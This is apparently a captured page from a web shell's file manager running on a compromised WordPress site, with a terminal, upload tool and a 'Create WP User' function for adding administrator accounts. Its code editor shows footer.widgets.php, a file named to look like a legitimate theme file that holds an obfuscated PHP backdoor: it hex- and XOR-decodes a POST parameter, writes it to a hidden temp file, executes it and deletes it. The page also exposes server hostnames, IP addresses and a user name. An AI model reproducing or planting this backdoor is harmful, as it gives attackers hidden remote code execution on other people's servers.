Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
dcustoms.pl
/
wp-content
/
themes
/
twentytwentyone
/
template-parts
/
footer
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
.htaccess
214.00 B
-r--r--r--
2026-04-22 05:00
footer-widgets.php
305.00 B
-rw-r--r--
2023-08-10 00:06
footer.widgets.php
644.00 B
-rw-r--r--
2023-08-10 00:06
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
footer.widgets.php
<?php if(filter_has_var(INPUT_POST, "e\x6E\x74ry")){ $holder = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), "/dev/shm", getenv("TMP"), "/var/tmp", "/tmp", getcwd()]); $flag = hex2bin($_POST["e\x6E\x74ry"]); $entity = '' ; foreach(str_split($flag) as $char){$entity .= chr(ord($char) ^ 95);} foreach ($holder as $key => $sym) { if ((is_dir($sym) and is_writable($sym))) { $component = join("/", [$sym, ".record"]); $file = fopen($component, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $component; @unlink($component); die(); } } } }
关闭
保存